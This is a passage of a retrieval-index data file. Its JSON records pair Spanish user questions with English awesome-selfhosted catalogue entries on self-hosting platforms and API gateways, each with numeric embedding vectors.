-0.09906, -0.02753, 0.02911, -0.04922, 0.00021, -0.00649, 0.05452, -0.01389, -0.00445, 0.01071, 0.04466, 0.05133, 0.03095, 0.03198, 0.01472, 0.08436, -0.02169, -0.05167, 0.06147, 0.02983, -0.07038, 0.03602, -0.02203, 0.00954, 0.01754, -0.05202, -0.05367, -0.01891, 0.0518, 0.00809, 0.02605, -0.0248, 0.02269, 0.03343, 0.04726, 0.022, 0.08975, 0.02615, -0.04457, 0.00727, -0.04988, -0.01085, 0.00621, 0.02118, 0.03077, -0.01225, 0.02112, -0.05093, -0.04502, -0.06029, 0.02432, -0.06093, -0.00661, 0.01402, 0.00483, 0.01345, 0.05996, 0.01404, 0.00766]} -{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: NextCloudPi β€” Nextcloud preinstalled and preconfigured, with a text and web management interface and all the tools needed to self host private data. With installation images for Raspberry Pi, Odroid, Rock64, Docker, and a curl installer for Armbian/Debian [GPL-2.0, Shell/PHP]. Nirvati β€” Easily 1-click spin up popular self-hosted apps from a convenient web interface [AGPL-3.0, Rust/K8S]. OpenMediaVault β€” Network attached storage (NAS) solution based on Debian Linux. It contains services like SSH, (S)FTP, SMB/CIFS, DAAP media server, RSync, BitTorrent client and many more [GPL-3.0, PHP]. Sandstorm β€” Personal server for running self-hosted apps easily and securely [Apache-2.0, C++/Shell]. Self Host Blocks β€” Modular server management based on NixOS modules and focused on best practices [⚠, AGPL-3.0, Nix]. StartOS β€” Browser-based, graphical Operating System (OS) that makes running a personal server as easy as running a personal computer [MIT, Rust].", "indexar": "con quΓ© programa puedo montar un servidor privado para mi hogar de forma fΓ‘cil?", "v": [-0.08853, 0.09794, -0.17017, -0.1635, -0.15498, -0.04015, 0.05854, -0.04075, -0.15444, -0.1262, -0.03362, -0.00016, 0.11345, -0.10658, 0.05518, 0.05311, 0.22008, -0.11783, 0.03591, 0.10649, -0.01679, 0.05351, -0.02513, -0.06718, -0.06656, -0.00539, 0.15758, -0.01348, -0.10822, 0.01377, 0.03441, 0.04089, 0.02276, 0.02705, -0.02146, -0.0345, 0.07715, 0.08611, -0.03579, -0.02197, 0.08761, -0.04451, 0.03694, 0.11571, 0.0433, 0.00584, 0.08553, -0.13044, -0.02788, -0.0372, -0.00702, -0.09135, -0.04518, 0.03429, -0.0225, -0.0367, 0.00213, -0.14997, 0.10092, 0.0378, -0.0751, 0.04323, 0.04184, 0.09052, 0.0641, -0.03554, -0.02394, 0.00459, -0.09566, -0.10415, -0.04729, -0.07268, -0.00478, -0.02759, -0.01735, 0.07659, -0.0044, -0.1151, 0.0925, 0.02878, 0.03983, 0.02382, -0.01182, 0.14191, -0.04061, -0.05666, -0.05438, -0.0655, 0.08265, -0.04844, 0.04736, 0.0429, 0.0077, 0.09102, -0.02789, -0.09424, 0.1782, 0.11326, -0.02522, -0.00373, 0.03099, 0.02653, -0.03927, 0.16551, 0.00985, 0.06382, 0.08468, -0.01208, -0.02801, 0.01155, 0.02213, 0.05609, -0.08375, 0.00725, -0.0705, -0.09039, -0.09573, 0.00533, 0.03469, -0.01541, -0.09674, 0.07753, 0.05813, 0.06289, 0.03499, -0.08765, 0.10207, 0.05343, -0.0683, 0.04236, -0.01863, -0.0126, -0.0361, -0.01818, 0.017, 0.01268, -0.00952, -0.11572, -0.05921, -0.0465, 0.07599, 0.0101, -0.03476, -0.04457, 0.08079, -0.01059, 0.06638, -0.09555, -0.02496, 0.03239, 0.01676, 0.06221, -0.0105, -0.04763, -0.08246, -0.05456, 0.03861, -0.05682, -0.00589, 0.07201, -0.01295, 0.06712, -0.00418, -0.04657, 0.02978, 0.01677, 0.04715, 0.03877, 0.0553, 0.08797, -0.09086, 0.06746, -0.00393, -0.0721, 0.04942, -0.00638, -0.03253, -0.07328, -0.02836, 0.01644, -0.06517, 0.08496, -0.01281, 0.00203, -0.06466, 0.01032, -0.00156, 0.07269, -0.01134, -0.03352, -0.06323, -0.00717, -0.05008, 0.05119, 0.04023, -0.06878, -0.02569, -0.02474, 0.03456, -0.03312, -0.05616, -0.06193, 0.03543, -0.00423, 0.01212, 0.00662, -0.03307, 0.00331, 0.07024, 0.08055, 0.01481, -0.00844, 0.07863, -0.01414, 0.03279, 0.08387, -0.019, -0.02683, 0.04635, 0.06496, 0.01617, 0.02062, 0.01346, 0.01011, 0.03848, -0.01003, -0.00777, -0.03653, 0.02944, 0.01583, -0.038, -0.05379, -0.00825, -0.01651, 0.03318, -0.0621, 0.00942, -0.04543, -0.0271, -0.03884, 0.03508, 0.08329, 0.00385, -0.01584, -0.04033, -0.03547, -0.00904, 0.04197, -0.04198, -0.00612, -0.0461, -0.04666, -0.00602, -0.07518, -0.00215, 0.02452]} -{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: NextCloudPi β€” Nextcloud preinstalled and preconfigured, with a text and web management interface and all the tools needed to self host private data. With installation images for Raspberry Pi, Odroid, Rock64, Docker, and a curl installer for Armbian/Debian [GPL-2.0, Shell/PHP]. Nirvati β€” Easily 1-click spin up popular self-hosted apps from a convenient web interface [AGPL-3.0, Rust/K8S]. OpenMediaVault β€” Network attached storage (NAS) solution based on Debian Linux. It contains services like SSH, (S)FTP, SMB/CIFS, DAAP media server, RSync, BitTorrent client and many more [GPL-3.0, PHP]. Sandstorm β€” Personal server for running self-hosted apps easily and securely [Apache-2.0, C++/Shell]. Self Host Blocks β€” Modular server management based on NixOS modules and focused on best practices [⚠, AGPL-3.0, Nix]. StartOS β€” Browser-based, graphical Operating System (OS) that makes running a personal server as easy as running a personal computer [MIT, Rust].", "indexar": "quΓ© herramienta me sirve para gestionar el almacenamiento en red sin pagar servicios externos?", "v": [-0.0319, 0.07307, -0.16667, -0.27996, 0.01896, -0.07251, -0.0989, -0.03173, -0.06638, -0.07726, -0.16511, -0.1816, 0.04616, -0.1441, 0.11656, 0.08179, 0.0533, -0.08525, 0.02422, 0.04608, -0.04119, 0.02181, -0.00906, -0.03731, -0.09816, 0.08691, 0.09817, -0.13931, -0.23861, 0.12076, 0.04703, -0.01737, 0.016, -0.13998, -0.10457, 0.06449, 0.03936, 0.0854, -0.02555, 0.01893, 0.00049, 0.03572, 0.01587, 0.07903, 0.03018, -0.04885, 0.06976, 0.00247, 0.01114, 0.09462, -0.06602, -0.17733, -0.14873, -0.03961, 0.00842, -0.10338, 0.07987, -0.13322, -0.03723, -0.06596, -0.12957, 0.10541, -0.01596, 0.10781, 0.05739, 0.00702, -0.01077, 0.04913, -0.07725, 0.08328, -0.07316, 0.0426, 0.04053, 0.00544, -0.0088, 0.00319, 0.11151, 0.04243, 0.02648, -0.02105, 0.03433, 0.09709, -0.08804, -0.00599, -0.01191, -0.0827, 0.02734, -0.04645, -0.00599, -0.00053, 0.04685, 0.01422, -0.05949, -0.03563, -0.0475, 0.04834, 0.06169, -0.03773, -0.02402, -0.04774, 0.13698, 0.03799, -0.05601, 0.0265, -0.01201, 0.07896, 0.0066, -0.09026, -0.00466, -0.02367, 0.07042, -0.01903, 0.05319, 0.0058, -0.02352, 0.06218, 0.04376, -0.02804, 0.00194, 0.04336, 0.02079, -0.02878, 0.01775, 0.00676, 0.07785, -0.05682, -0.03456, 0.04728, -0.00342, -0.00141, -0.04045, -0.09018, -0.0026, -0.00336, 0.02919, -0.05384, -0.01557, -0.08486, 0.01461, -0.04974, -0.036, -0.00019, -0.08589, -0.08456, 0.00615, -0.0034, 0.08508, -0.03229, -0.02898, 0.0057, 0.0266, -0.10554, -0.04696, -0.00051, -0.08414, 0.03986, -0.0319, -0.02816, -0.17454, 0.0315, -0.04163, -0.09145, 0.04131, 0.07047, -0.04247, -0.05206, 0.04544, 0.03437, 0.04514, 0.04251, 0.04134, 0.00867, 0.02478, -0.06527, 0.01402, -0.06337, -0.03671, -0.08507, 0.07032, -0.01937, -0.01708, -0.0039, -0.03495, 0.02868, -0.04221, -0.04757, 0.00512, 0.00853, -0.02352, -0.02051, 0.00409, 0.01779, 0.01644, -0.03452, 0.04197, -0.0298, -0.04886, -0.06984, -0.00468, 0.03082, -0.05809, 0.01954, 0.01106, -0.00169, -0.02874, 0.04176, -0.03439, 0.07801, 0.01773, 0.03603, -0.00747, 0.07521, 0.08531, -0.02168, -0.03446, -0.03222, 0.02857, 0.01611, -0.00913, 0.00083, 0.02368, -0.05329, -0.00655, -0.02245, -0.03619, 0.04681, 0.0412, 0.00514, -0.01977, 0.00284, -0.01663, -0.0233, -0.034, 0.05122, 0.02449, -0.10135, 0.04217, -0.02155, -0.04182, 0.00155, 0.01714, 0.04469, -0.05281, -0.00513, -0.00951, -0.01137, -0.02425, 0.00114, -0.02489, -0.04081, -0.01342, 0.01383, 0.02347, -0.01433, 0.01733, 0.00245]} -{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: NextCloudPi β€” Nextcloud preinstalled and preconfigured, with a text and web management interface and all the tools needed to self host private data. With installation images for Raspberry Pi, Odroid, Rock64, Docker, and a curl installer for Armbian/Debian [GPL-2.0, Shell/PHP]. Nirvati β€” Easily 1-click spin up popular self-hosted apps from a convenient web interface [AGPL-3.0, Rust/K8S]. OpenMediaVault β€” Network attached storage (NAS) solution based on Debian Linux. It contains services like SSH, (S)FTP, SMB/CIFS, DAAP media server, RSync, BitTorrent client and many more [GPL-3.0, PHP]. Sandstorm β€” Personal server for running self-hosted apps easily and securely [Apache-2.0, C++/Shell]. Self Host Blocks β€” Modular server management based on NixOS modules and focused on best practices [⚠, AGPL-3.0, Nix]. StartOS β€” Browser-based, graphical Operating System (OS) that makes running a personal server as easy as running a personal computer [MIT, Rust].", "indexar": "cual es una alternativa libre para instalar aplicaciones propias en servidores pequeΓ±os como los Raspberry Pi?", "v": [-0.10256, 0.09025, -0.06688, -0.23393, 0.02231, -0.14668, 0.01272, -0.1485, -0.11003, -0.02605, 0.01019, -0.08431, 0.02312, -0.08814, 0.14284, -0.12333, -0.03434, -0.03594, 0.19069, 0.03649, -0.08573, 0.02893, -0.13391, 0.08826, -0.00884, 0.14119, 0.1267, 0.01471, -0.11354, 0.02448, 0.0962, -0.01154, 0.05307, -0.10472, -0.20343, -0.02772, 0.03296, 8e-05, 0.00552, 0.00359, 0.10662, -0.01955, -0.07115, 0.09124, 0.00871, 0.01909, 0.06177, 0.02538, 0.05168, 0.0104, -0.09854, -0.02008, -0.01056, 0.03828, 0.00518, -0.04554, 0.10591, -0.16816, 0.0589, 0.03205, -0.17147, 0.12561, -0.01676, 0.02874, 0.07039, -0.08168, -0.07132, 0.05456, -0.1538, 0.06591, 0.00421, 0.01618, -0.03285, -0.08875, 0.02177, 0.15827, -0.1172, -0.03489, 0.09321, 0.05081, 0.01734, -0.06928, -0.02479, 0.03019, -0.03438, -0.12106, 0.02857, -0.04121, 0.0834, 0.04546, 0.00302, 0.0928, 0.00063, 0.08268, 0.03213, -0.05063, 0.13024, 0.0285, 0.09139, 0.10769, 0.02226, 0.03171, -0.02962, -0.0564, -0.04563, -0.00119, 0.07275, -0.0241, -0.00137, -0.05575, 0.00396, -0.01354, -0.018, 0.05165, -0.03863, -0.08427, 0.01626, -0.0484, -0.04467, 0.00239, -0.06935, -0.06387, 0.03048, 0.0266, 0.00835, 0.01757, 0.01246, 0.03005, -0.02684, 0.041, 0.09165, -0.10808, -0.02354, 0.01207, -0.11348, -0.02776, 0.10121, -0.06951, -0.03661, 0.00985, 0.02059, 0.03324, 0.04243, -0.07651, 0.0914, -0.01131, 0.02614, -0.00769, 0.066, -0.00897, -0.02064, -0.02525, -0.06069, 0.05822, -0.04324, 0.02089, -0.02731, -0.02522, -0.02786, 0.04747, 0.00224, -0.06031, -0.03346, 0.00462, -0.01321, -0.05491, 0.00845, 0.01929, 0.07246, 0.08349, -0.00538, 0.07218, 0.00498, -0.07924, 0.02905, -0.06187, -0.04873, -0.03208, 0.05439, -0.05711, -0.00955, 0.06623, -0.04994, 0.04122, -0.0351, -0.03034, -0.02199, -0.00177, 0.0121, 0.00305, 0.01192, 0.03676, -0.03363, -0.05603, 0.03578, -0.00976, -0.01432, -0.1038, -0.03537, -0.00238, -0.02582, 0.01627, -0.08484, -0.00671, 0.01819, -0.02416, -0.03085, 0.0717, -0.02721, 0.06094, 0.03555, 0.03042, 0.07987, 0.04045, -0.01569, -0.02654, 0.00304, 0.00652, 0.01519, 0.00105, 0.00884, 0.0233, 0.02696, 0.00802, -0.05967, 0.02091, 0.03343, 0.01152, -0.00339, 0.02399, -0.01027, 0.02929, 0.02052, -0.01702, 0.01695, -0.05152, 0.03314, 0.02619, -0.02483, -0.04905, 0.02843, 0.10177, 0.03611, -0.05258, -0.06443, -0.02991, -0.02704, 0.01543, -0.01989, -0.03325, -0.00906, 0.02705, 0.04226, -0.00606, -0.02934, 0.00638]} -{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: Syncloud β€” Your own online file storage, social network or email server [GPL-3.0, Go/Shell]. Tipi β€” Homeserver manager. One command setup, one click installs for your favorites self-hosted apps [GPL-3.0, Shell]. UBOS β€” Linux distro that runs on indie boxes (personal servers and IoT devices). Single-command installation and management of apps - Jenkins, Mediawiki, Owncloud, WordPress, etc., and other features [GPL-3.0, Perl]. Websoft9 β€” GitOps-driven, multi-application hosting for cloud servers and home servers, one-click deployment of 200+ open source apps [⚠, LGPL-3.0, Shell/Python]. WikiSuite β€” The most comprehensive and integrated Free / Libre / Open Source enterprise software suite [GPL-3.0/LGPL-2.1/Apache-2.0/MPL-2.0/MPL-1.1/MIT/AGPL-3.0, Shell/Perl/deb]. xsrv β€” Install and manage self-hosted services/applications, on your own server(s) [GPL-3.0, Ansible/Shell]. YunoHost β€” Server operating system aiming to make self-hosting accessible to everyone [AGPL-3.0, Python/Shell].", "indexar": "cual programa me sirve para instalar y gestionar mΓΊltiples aplicaciones en mi propio servidor de forma sencilla", "v": [-0.028, 0.16433, -0.17614, -0.24655, -0.00962, -0.10632, -0.03098, -0.11128, -0.11755, -0.0501, -0.05469, -0.05874, 0.04821, -0.13728, 0.06845, 0.02892, 0.12795, -0.23728, 0.03737, 0.08169, -0.0075, 0.03143, -0.0133, -0.05055, -0.13112, 0.09571, 0.10838, -0.07951, -0.08911, -0.06335, 0.03281, 0.00907, 0.05083, -0.12673, -0.0214, -0.07341, -0.0634, 0.03694, -0.06276, 0.0095, 0.03436, -0.00722, -0.04432, 0.08205, 0.03488, 0.00127, 0.11023, -0.08414, -0.00685, -0.0069, -0.05226, -0.08689, -0.02875, 0.00757, 0.01674, -0.06172, 0.06049, -0.21035, 0.03084, 0.01521, -0.11955, 0.05552, -0.01842, 0.02843, 0.10637, -0.02439, 0.03425, 0.03618, -0.11318, -0.0206, -0.06429, 0.07196, 0.02727, -0.0388, 0.02902, 0.08931, -0.01573, -0.02051, 0.0756, 0.0006, 0.0142, -0.0355, -0.05819, 0.05181, -0.06415, -0.0787, 0.02555, -0.00716, 0.02502, 0.01273, 0.01691, -0.02926, -0.07182, 0.02943, 0.03805, -0.07669, 0.1207, 0.04834, 0.04083, 0.09014, 0.05514, -0.00475, -0.05316, 0.07926, -0.10287, 0.06166, 0.08976, -0.11308, -0.01179, -0.03939, 0.02045, -0.0485, -0.01056, 0.01758, -0.04648, -0.00456, 0.01373, -0.05257, 0.02391, -0.00987, -0.12688, -0.05243, 0.00733, 0.0408, 0.11182, -0.06393, 0.01881, 0.08642, 0.01198, 0.06995, 0.00128, -0.0436, -0.03894, -0.00748, -0.08187, -0.02837, 0.04705, -0.06224, -0.03867, -0.08933, 0.02271, 0.11358, -0.01026, -0.0471, 0.08994, 4e-05, 0.05957, -0.07149, 0.02485, 0.04651, 0.04549, -0.06196, -0.05332, 0.04894, -0.11883, -0.03184, 0.02369, -0.07109, -0.0418, 0.0443, -0.03425, 0.02401, -0.00391, 0.02059, 0.00803, -0.04399, -0.00734, 0.03948, 0.11509, 0.08015, -0.04158, 0.06977, 0.01196, -0.04867, 0.01339, -0.06302, -0.03514, -0.07359, 0.04604, -0.02209, -0.06738, 0.03872, 0.05002, 0.03317, -0.05292, -0.07543, -0.06728, 0.04522, -0.00887, -0.00838, 0.02569, 0.04867, -0.07268, -0.0273, 0.03965, -0.0376, -0.02986, -0.06595, -0.03608, -0.04912, -0.05244, 0.0071, -0.02962, -0.01791, 0.06758, 0.08668, -0.03452, 0.05681, 0.03795, 0.08745, -0.00208, 0.00849, 0.10664, 0.01215, -0.01747, -0.07011, 0.0557, -0.01434, 0.03958, 0.01228, -0.03724, -0.03149, 0.0278, 0.00096, -0.02568, -0.02877, 0.02725, 0.00913, 0.01854, 0.00467, -0.04601, -0.00436, -0.01363, -0.04014, 0.03506, -0.02458, 0.03837, -0.03796, -0.02964, -0.09236, 0.02314, 0.08653, 0.02732, -0.05901, -0.04904, -0.03376, -0.0481, 0.02881, -0.03539, -0.02272, -0.0376, 0.03468, 0.05658, -0.02054, 0.01706, -0.00688]} -{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: Syncloud β€” Your own online file storage, social network or email server [GPL-3.0, Go/Shell]. Tipi β€” Homeserver manager. One command setup, one click installs for your favorites self-hosted apps [GPL-3.0, Shell]. UBOS β€” Linux distro that runs on indie boxes (personal servers and IoT devices). Single-command installation and management of apps - Jenkins, Mediawiki, Owncloud, WordPress, etc., and other features [GPL-3.0, Perl]. Websoft9 β€” GitOps-driven, multi-application hosting for cloud servers and home servers, one-click deployment of 200+ open source apps [⚠, LGPL-3.0, Shell/Python]. WikiSuite β€” The most comprehensive and integrated Free / Libre / Open Source enterprise software suite [GPL-3.0/LGPL-2.1/Apache-2.0/MPL-2.0/MPL-1.1/MIT/AGPL-3.0, Shell/Perl/deb]. xsrv β€” Install and manage self-hosted services/applications, on your own server(s) [GPL-3.0, Ansible/Shell]. YunoHost β€” Server operating system aiming to make self-hosting accessible to everyone [AGPL-3.0, Python/Shell].", "indexar": "hay alguna herramienta que permita configurar y mantener un servidor personal con diferentes servicios integrados", "v": [0.05582, 0.19566, -0.22328, -0.21735, 0.01299, -0.16654, -0.01958, -0.07165, -0.0968, -0.11245, -0.11671, 0.00417, 0.07455, -0.11937, 0.07717, 0.06978, 0.15076, -0.15597, 0.04157, 0.10068, -0.03342, 0.0703, -0.01321, -0.00058, -0.1483, -0.03054, 0.09007, -0.10824, -0.13309, -0.00484, 0.016, -0.04857, -0.0046, -0.02042, -0.07047, -0.10312, -0.02951, 0.09064, -0.01059, 0.00416, 0.05064, -0.03123, 0.04275, 0.09575, 0.07469, 0.05491, -0.01945, -0.00069, 0.06146, 0.02931, -0.06781, -0.11833, -0.08905, -0.04508, -0.00553, -0.05796, 0.14562, -0.16029, 0.01322, -0.14411, -0.1238, 0.07903, -0.01273, 0.02036, 0.07681, 0.03742, -0.0323, -0.09735, -0.02414, 0.01103, -0.05612, -0.02554, -0.02882, -0.05578, 0.04739, 0.0231, 0.03956, 0.03836, 0.06664, 0.07551, 0.00716, 0.00114, -0.08346, 0.0641, -0.13024, -0.09241, 0.04981, -0.01359, 0.05674, -0.00143, 0.10223, 0.05122, -0.07468, 0.02677, -0.02557, 0.04151, 0.11264, 0.0148, -0.04512, -0.01661, 0.17674, 0.0776, -0.08073, 0.08993, -0.04206, 0.07061, 0.0858, -0.07329, 0.04148, -0.03235, 0.03145, 0.03496, 0.00179, 0.00135, -0.03449, -0.05684, -0.02736, -0.06357, 0.03465, -0.00337, -0.04442, -0.00382, 0.02547, 0.05223, 0.01064, 0.00964, 0.00436, 0.05353, -0.00645, -0.01511, -0.02747, -0.07141, -0.0601, 0.00378, -0.01451, 0.01364, 0.03448, -0.10435, -0.04002, -0.06417, 0.039, 0.00454, 0.00539, -0.04987, 0.10205, -0.01171, 0.00886, -0.07146, -0.0805, 0.01184, -0.00351, -0.05938, -0.02192, 0.02917, -0.12264, 0.02204, -0.01258, -0.06302, -0.07638, 0.03104, -0.02175, -0.02539, 0.09026, 0.07606, 0.03599, -0.01395, 0.02411, 0.05468, 0.09335, 0.06027, -0.04508, 0.00761, 0.04667, -0.0334, -0.04027, -0.02608, -0.09074, -0.0187, 0.05461, -0.01891, -0.01765, -0.00459, -0.01047, -0.02624, -0.02737, -0.05564, -0.05255, -0.03423, -0.04101, -0.00686, -0.01013, 0.04743, -0.05124, 0.00432, 0.06044, -0.05891, -0.05252, -0.03425, -0.01318, -0.00264, -0.05123, -0.02708, -0.03229, -0.04461, -0.01066, 0.02659, -0.0376, 0.0213, 0.01337, 0.01343, 0.01641, -0.03493, 0.06216, -0.06028, -0.02553, 0.01129, 0.07012, -0.00391, 0.0075, 0.01109, 0.01219, -0.01493, 0.04542, -0.03604, -0.01736, 0.03913, 0.04235, -0.0083, 0.04, 0.00449, -0.02805, -0.02206, -0.05675, -0.01762, 0.02374, -0.01189, 0.05144, -0.04625, -0.04878, -0.07009, 0.03676, 0.08413, -0.00697, -0.02334, -0.01857, -0.08178, -0.0136, -0.01668, -0.00343, -0.0639, 0.00784, 0.0036, 0.03583, -0.05225, -0.00127, -0.0319]} -{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: Syncloud β€” Your own online file storage, social network or email server [GPL-3.0, Go/Shell]. Tipi β€” Homeserver manager. One command setup, one click installs for your favorites self-hosted apps [GPL-3.0, Shell]. UBOS β€” Linux distro that runs on indie boxes (personal servers and IoT devices). Single-command installation and management of apps - Jenkins, Mediawiki, Owncloud, WordPress, etc., and other features [GPL-3.0, Perl]. Websoft9 β€” GitOps-driven, multi-application hosting for cloud servers and home servers, one-click deployment of 200+ open source apps [⚠, LGPL-3.0, Shell/Python]. WikiSuite β€” The most comprehensive and integrated Free / Libre / Open Source enterprise software suite [GPL-3.0/LGPL-2.1/Apache-2.0/MPL-2.0/MPL-1.1/MIT/AGPL-3.0, Shell/Perl/deb]. xsrv β€” Install and manage self-hosted services/applications, on your own server(s) [GPL-3.0, Ansible/Shell]. YunoHost β€” Server operating system aiming to make self-hosting accessible to everyone [AGPL-3.0, Python/Shell].", "indexar": "con quΓ© puedo montar una soluciΓ³n completa de software libre para alojar aplicaciones como redes sociales o almacenamiento", "v": [-0.04795, 0.1017, -0.17051, -0.17545, -0.13831, -0.03898, -0.08417, -0.05619, -0.18479, -0.048, -0.11601, -0.1948, -0.02179, -0.06812, 0.15229, 0.00242, 0.05157, -0.12519, 0.04218, 0.05827, -0.06957, -0.00647, -0.16045, -0.12219, -0.04418, 0.08393, 0.08563, -0.07844, -0.14732, 0.03639, 0.0076, -0.02068, 0.10947, -0.04846, -0.10706, 0.0171, 0.05977, 0.0537, -0.08356, -0.00029, 0.04492, -0.04645, -0.02492, 0.05986, 0.00587, 0.03559, 0.01662, -0.08003, -0.03863, -0.04221, -0.01694, -0.0367, -0.07234, 0.03708, 0.00022, -0.07753, 0.1185, -0.05915, 0.01509, -0.00362, -0.15922, 0.10453, 0.01001, 0.02752, 0.07467, -0.06678, -0.01096, 0.14544, -0.11294, 0.07436, 0.00281, 0.0571, 0.02073, 0.02951, 0.02523, 0.13745, -0.10627, 0.04347, -0.02474, 0.03353, -0.03486, -0.00415, -0.03556, 0.05114, -0.06239, -0.078, 0.0879, -0.09069, 0.0276, 0.00149, 0.02624, 0.02088, -0.05496, 0.03688, 0.01047, -0.09605, 0.07062, 0.07707, 0.04855, 0.04634, -0.04337, -0.03452, -0.06366, 0.01909, -0.10322, -0.07643, -0.00318, -0.1149, 0.01255, -0.04958, 0.09976, 0.00332, 0.03794, -0.02151, -0.0944, -0.00207, -0.01545, -0.01322, 0.03856, -0.00816, -0.0225, -0.02229, 0.05012, -0.04322, 0.10465, 0.05947, 0.04572, 0.1742, -0.06264, 0.00852, -0.02115, -0.04713, -0.12346, -0.04832, 0.00517, -0.05208, 0.00206, -0.04599, -0.00603, -0.02903, -0.02618, -0.00451, -0.05584, -0.06577, 0.05021, 0.01813, 0.01544, -0.08329, -0.03467, -0.0078, 0.07608, 0.0415, -0.03563, -0.01721, -0.10368, 0.0496, -0.03485, -0.04379, 0.00456, 0.03327, -0.0338, -0.03104, -0.0719, -0.03832, -0.06987, -0.05202, -0.01098, 0.03403, 0.04687, 0.04828, -0.05227, 0.08563, 0.05696, -0.10298, 0.05234, -0.03626, 0.00199, -0.06995, -0.02007, -0.05941, -0.12255, -0.02563, 0.02223, 0.03149, -0.00079, -0.08437, 0.00663, 0.02445, 0.01515, 0.03236, -0.02867, 0.00768, 0.00147, -0.02263, 0.07105, -0.05798, -0.02269, -0.0308, 0.03795, 0.03419, -0.08745, -0.01837, -0.05194, 0.0184, -0.00912, 0.03725, -0.05407, 0.05954, 0.01013, 0.0761, -0.02266, -0.03285, 0.06547, 0.01322, -0.06815, -0.06995, 0.07168, 0.01598, -0.01889, 0.02952, -0.0014, 0.03536, 0.04368, 0.00906, -0.01825, 0.03648, 0.01345, 0.03245, 0.01145, 0.01545, 0.00594, -0.02008, -0.04262, -0.02055, 0.06094, -0.00874, 0.00522, -0.02345, -0.02115, 0.00271, 0.0201, 0.07321, 0.02478, 0.0181, -0.07352, -0.03098, -0.08996, 0.0264, 0.01358, -0.0543, -0.04186, 0.05192, 0.0657, -0.02581, -0.00762, -0.03121]} -{"tipo": "pregunta", "herramienta": "Software Development - API Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - API Management", "tema": "software development - api management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - API Management: Aastro β€” Extensible API Gateway written in Go [Apache-2.0, Go/Docker]. DreamFactory β€” Turns any SQL/NoSQL/Structured data into Restful API [Apache-2.0, PHP/Docker/K8S]. form.io β€” A REST API building platform that utilizes a drag & drop form builder, and is application framework agnostic. Contains open source and enterprise version [MIT, Nodejs/Docker]. Fusio β€” Open-source API management platform which helps to build and manage REST APIs [AGPL-3.0, PHP/Docker]. Graphweaver β€” Turn multiple data sources into a single GraphQL API [MIT, Nodejs]. Hasura β€” Fast, instant realtime GraphQL APIs on Postgres with fine grained access control, also trigger webhooks on database events [Apache-2.0, Haskell/Docker/K8S]. Hoppscotch Community Edition β€” Fast and beautiful API request builder [MIT, Nodejs/Docker]. Kong β€” Microservice API Gateway and Platform [Apache-2.0, Lua/Docker/K8S/deb]. Lura β€” High-performance API Gateway [Apache-2.0, Go].", "indexar": "quΓ© programa sirve para construir y gestionar APIs RESTful de forma sencilla?", "v": [-0.16319, -0.00306, -0.1342, -0.27229, 0.07904, -0.09297, 0.0618, -0.1225, -0.08795, -0.02176, -0.09217, -0.11447, -0.00528, -0.08209, 0.1923, 0.01207, 0.0334, -0.07861, 0.00266, 0.13051, -0.03682, 0.02162, -0.04415, 0.02281, 0.01635, 0.04344, 0.15514, -0.08395, -0.04544, -0.00497, 0.0527, 0.01326, 0.00483, -0.10375, -0.07631, 0.01655, 0.01519, 0.03323, -0.07116, 0.07628, -0.08583, -0.00915, -0.02611, 0.09712, 0.01051, 0.02736, 0.17095, -0.11, 0.01763, 0.03878, -0.01569, -0.02604, -0.06006, 0.04035, 0.0434, 0.03208, -0.07245, -0.28685, -0.014, 0.00572, -0.08258, -0.01398, -0.07605, -0.01905, 0.04873, 0.00311, 0.03613, 0.02831, -0.101, 0.04581, -0.05895, -0.08901, 0.04755, 0.03083, 0.04441, 0.02324, 0.01632, -0.05063, -0.01348, -0.0046, 0.0039, 0.00887, -0.0456, -0.06957, 0.1161, 0.01573, -0.08504, -0.04489, -0.03984, 0.01485, -0.05379, -0.0471, 0.01166, 0.02407, 0.0243, 0.0048, 0.08926, 0.04923, 0.01773, -0.00973, -0.07186, -0.12718, -0.09009, 0.03318, -0.00815, 0.10618, 0.09956, -0.03579, -0.01419, -0.01366, 0.00749, 0.02335, -0.10142, -0.00781, -0.0062, 0.07311, -0.02713, -0.00711, 0.03487, -0.03763, -0.05436, -0.01883, -0.046, 0.06083, 0.02596, -0.00297, -0.00874, 0.13423, 0.02823, 0.05126, -0.04254, -0.00833, -0.00931, 0.04367, -0.0285, -0.02389, 0.11276, -0.03903, -0.01959, -0.07438, -0.03547, 0.08841, -0.02955, -0.01655, -0.0491, -0.06404, 0.08515, -0.07439, 0.0567, 0.02938, 0.0816, -0.04645, -0.06775, 0.02939, -0.10268, -0.09573, -0.00242, -0.00777, -0.1313, 0.07592, -0.04085, 0.02249, 